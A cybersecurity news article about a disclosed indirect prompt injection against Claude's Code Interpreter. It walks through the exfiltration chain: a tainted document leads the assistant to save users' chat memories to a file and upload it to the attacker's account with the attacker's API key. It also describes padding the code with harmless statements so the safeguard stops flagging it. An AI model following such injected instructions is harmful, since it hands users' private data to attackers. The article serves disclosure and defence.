Hackers Exploit Indirect Prompts In Claude AI APIs To Exfiltrate User Data

Anthropic’s Claude AI recently gained the ability to perform network requests through its Code Interpreter feature, aimed at enhancing functionality like package installations.

However, this innovation opens doors to serious security threats. Security researcher Johann Rehberger, in a detailed blog post titled “Claude Pirate,” demonstrates how attackers can exploit this capability for unauthorized data theft.

The core issue lies in the default “Package managers only” network egress setting, which allow-lists a short domain list including api.anthropic.com.

While intended for safe operations like accessing npm or PyPI, it inadvertently permits interactions with Anthropic’s APIs.

The attack begins with indirect prompt injection, where malicious content embedded in documents or user inputs tricks Claude into executing harmful instructions.

Unlike common hyperlink-based leaks, this method uses Claude’s built-in Files API.

An adversary crafts a payload that instructs the AI to access sensitive user data, such as past chat histories via the new “memories” feature.

This data gets saved to a file within the Code Interpreter’s sandbox, typically at a path like /mnt/user-data/outputs/hello.md.

Executing The Exfiltration Chain

From there, the exploit escalates by running Python code that imports the Anthropic library and sets the attacker’s API key as an environment variable.

The script then uploads the file directly to the attacker’s Anthropic Console using client.beta.files.upload().

This bypasses the victim’s account entirely, as the upload authenticates with the intruder’s credentials. Rehberger notes that files up to 30MB can be exfiltrated per upload, with multiples possible for larger hauls.

Initial tests succeeded immediately, but Claude’s safeguards later flagged suspicious elements like plaintext API keys.

The researcher evaded detection by padding the code with benign snippets, such as simple print statements, making the payload appear innocuous.

A demo video and screenshots illustrate the process: the attacker views an empty console, the victim processes a tainted document, Claude hijacks the session to extract and upload data, and the file magically appears in the attacker’s account for easy access.

This “AI kill chain” underscores how AI agents can be weaponized for remote command-and-control.

Disclosure, Risks, And Safeguards

Rehberger responsibly disclosed the flaw to Anthropic on October 25, 2025, via HackerOne.

Initially deemed out-of-scope as a “model safety issue,” Anthropic later acknowledged it as a valid vulnerability on October 30, citing process improvements.

The company already warns in its documentation about exfiltration risks from connected sources, urging users to monitor sessions and halt unexpected actions.

For mitigation, Anthropic could enforce sandbox rules limiting API calls to the authenticated user’s account.

Users should disable network access, whitelist only essential domains, or vigilantly oversee Code Interpreter runs especially since the default mode proves insecure.

Broader implications tie into the “lethal trifecta” of AI risks: capable models, external connectivity, and untrusted inputs.

As AI tools evolve, such exploits remind developers and enterprises to prioritize adversarial testing. Staying vigilant protects against turning helpful assistants into unwitting spies.

Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies..

Next Microsoft’s Latest WSUS Patch Breaks Hotpatching On Windows Server 2025 »

Previous « Apple Releases iOS 26.1 And iPadOS 26.1 To Fix Multiple Critical Security Flaws

Burp Suite Supercharges Its Scanning Capabilities With React2Shell Vulnerability Detection

PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…

4 months ago

Vulnerabilities

Malicious MCP Servers Enable New Prompt Injection Attack To Drain Resources

Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…

4 months ago

Cybersecurity News

Law Enforcement Detains Hackers Equipped With Specialized Flipper Hacking Tools

Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…

4 months ago

Google Unveils 10 New Gemini-Powered AI Features For Chrome

Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…

4 months ago

Vulnerabilities

CISA Alerts On Actively Exploited Buffer Overflow Flaw In D-Link Routers

Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…

4 months ago

Vulnerabilities

Over 500 Apache Tika Toolkit Instances Exposed To Critical XXE Vulnerability

Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…

4 months ago

Hackers Exploit Indirect Prompts In Claude AI APIs To Exfiltrate User Data

Executing The Exfiltration Chain

Disclosure, Risks, And Safeguards

Related Post

Recent Posts

Burp Suite Supercharges Its Scanning Capabilities With React2Shell Vulnerability Detection

Malicious MCP Servers Enable New Prompt Injection Attack To Drain Resources

Law Enforcement Detains Hackers Equipped With Specialized Flipper Hacking Tools

Google Unveils 10 New Gemini-Powered AI Features For Chrome

CISA Alerts On Actively Exploited Buffer Overflow Flaw In D-Link Routers

Over 500 Apache Tika Toolkit Instances Exposed To Critical XXE Vulnerability